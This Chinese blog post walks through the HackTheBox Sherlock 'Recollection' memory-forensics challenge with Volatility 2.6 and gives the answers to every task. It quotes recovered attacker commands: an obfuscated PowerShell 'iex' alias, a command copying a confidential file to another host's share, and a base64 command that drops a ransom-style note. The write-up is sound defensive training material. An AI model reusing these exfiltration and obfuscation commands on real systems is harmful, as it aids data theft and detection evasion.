【HTB】Sherlocks Recollection 蓝队 easy

工具:volatility2.6(2 比 3 完善) https://www.volatilityfoundation.org/25

kali 下载 volatility2.6

# 下载 pip2
sudo wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
# pycrypto、distorm3 所需依赖
sudo python2 -m pip install -U setuptools wheel
sudo apt install -y python2  libpython2-dev
# python 依赖
sudo pip2 install pycrypto distorm3

# 下载 volatility 到 /usr/share 目录
cd /usr/share
sudo git clone https://github.com/volatilityfoundation/volatility
cd volatility
sudo python2 setup.py install

# 测试
vol.py -h



Task 1-2

Task 1 题目:机器的操作系统是什么?

Task 2 题目:内存转储是什么时候创建的?


vol.py -f recollection.bin imageinfo

task 1 答案:Windows 7

task 2 答案:2022-12-19 16:07:30



Task 3

题目:攻击者获得计算机的访问权限后,将混淆的 PowerShell 命令复制到剪贴板。命令是什么?


vol.py -f recollection.bin --profile=Win7SP1x64 clipboard

task 3 答案:(gv 'MDR').naMe[3,11,2]-joIN''


Task 4-8

Task 4 题目:攻击者复制了混淆后的命令,将其用作 PowerShell cmdlet 的别名。cmdlet 名称是什么?

Task 5 题目:执行了 CMD 命令来尝试窃取文件。完整的命令行是什么?

Task 6 题目:按照上面的命令,现在告诉我们文件是否已成功泄露?

Task 7 题目:攻击者试图创建自述文件。文件的完整路径是什么?

Task 8 题目:机器的主机名是什么?


vol.py -f recollection.bin --profile=Win7SP1x64 consoles > consoles.txt	# 写入文件方便查看
cat consoles.txt|grep PS 	# 查看通过 powershell 执行的命令
# cat consoles.txt|grep cmd 这个命令比较详细

由于部分代码不全,但也可以看见

  • 查看 Confidential.txt 并发送到其他主机
  • 用 powershell 执行了一串 base64 编码后的命令
  • 进入 \Downloads 执行了一个文件
  • 执行了混淆代码
  • 执行net users

1、查看 Confidential.txt 并发送到其他主机

可惜 path 错误,没有成功导出

2、用 powershell 执行了一串 base64 编码后的命令

虽然部分代码不全,但也可以看出是同一串代码

你也可以用下列命令查看,代码不全是因为换行,只是这行代码不方便我截图

cat consoles.txt|grep '\-e' -A 1
# 解码
echo 'ZWNobyAiaGFja2VkIGJ5IG1hZmlhIiA+ICJDOlxVc2Vyc1xQdWJsaWNcT2ZmaWNlXHJlYWRtZS50eHQi'|base64 -d
# echo "hacked by mafia" > "C:\Users\Public\Office\readme.txt"

很明显这行代码比较嚣张

3、进入 \Downloads 执行了一个文件,暂且不知道这个可执行文件是干嘛的,先跳过

4、执行了混淆代码

  • 混淆代码利用大小写混淆,还原:(gv '*MDR*').name[3,11,2]-join''

  • 这串混淆代码在本地 powershell 执行结果同样的 iex(Invoke-Expression 的常用别名,参考:https://ss64.com/ps/invoke-expression.html)

  • iex 的作用相当于 eval 函数

5、执行net users

task 4 答案:Invoke-Expression

task 5 答案:type C:\Users\Public\Secret\Confidential.txt > \192.168.0.171\pulice\pass.txt

task 6 答案:No

task 7 答案:C:\Users\Public\Office\readme.txt

task 8 答案:USER-PC



Task 9

Task 9 题目:机器中有多少个用户帐户?


vol.py -f recollection.bin --profile=Win7SP1x64 printkey  -K "SAM\Domains\Account\Users\Names"

一共 4 个,除去隐藏用户

答案:3



Task 10

Task 10 题目:在“\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge”文件夹中有一些子文件夹,其中有一个名为passwords.txt的文件。完整的文件位置/路径是什么?


vol.py -f recollection.bin --profile=Win7SP1x64 filescan > filescan.txt
cat filescan.txt |grep 'passwords.txt'

答案:\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt


Task 11

Task 11 题目:使用命令执行恶意可执行文件。可执行EXE文件的名称是其自身的哈希值。哈希值是多少?


cat consoles.txt|grep '\.\\.*exe' 

答案:b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1



Task 12-13

Task 12 题目:接上一个问题,您上面找到的恶意文件的Imphash是什么?

Task 13 题目:继上一个问题之后,请告诉我们恶意文件的创建日期(UTC 格式)?


# 获取文件内存地址
cat filescan.txt|grep b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1.exe
# 导出文件
vol.py --profile=Win7SP1x64 -f recollection.bin dumpfiles -Q 0x000000011fa45c20 -D ./

上传到 vt 答案什么就有了

上传至威胁情报分析平台:https://www.virustotal.com/gui/home/search

task 12 答案:d3b592cd9481e4f053b5362e22d61595

task 13 答案:2022-06-22 11:49:04



Task 14

Task 14 题目:机器的本地 IP 地址是多少?


vol.py -f recollection.bin --profile=Win7SP1x64 netscan > netscan.txt
cat netscan.txt 

仔细查看 Local Address 列

答案:192.168.0.104



Task 15

Task 15 题目:有多个 PowerShell 进程,其中一个进程是子进程。哪个进程是其父进程?


vol.py -f recollection.bin --profile=Win7SP1x64 pstree >pstree.txt
cat pstree.txt|grep -i PowerShell -B 1

PowerShell 进程也没多少个啊,就俩

答案:cmd.exe



Task 16

Task 16 题目:攻击者可能使用电子邮件地址登录社交媒体。您能告诉我们电子邮件地址吗?


strings -el recollection.bin|grep -E '@(.*?)com$'

记得 task 7 要挟文件的内容吗 hacked by mafia



Task 17

Task 17 题目:受害者使用 MS Edge 浏览器搜索 SIEM 解决方案。SIEM 解决方案的名称是什么?


cat filescan.txt |grep -i history 
vol.py --profile=Win7SP1x64 -f recollection.bin dumpfiles -Q 0x000000011e0d16f0 -D ./
open file.None.0xfffffa80056d1440.dat

查看 keyword_search_terms 表的数据

答案:Wazuh



Task 18

Task 18 题目:受害者用户下载了一个exe文件。该文件的名称模仿了 Microsoft 的合法二进制文件,但存在拼写错误(即合法二进制文件是 powershell.exe,攻击者将恶意软件命名为 powershall.exe)。告诉我们文件名和文件扩展名?


cat filescan.txt |grep -i 'downloads' |grep exe

答案:csrsss.exe

posted @ 2024-03-16 21:07  kazie  阅读(110)  评论(0编辑  收藏  举报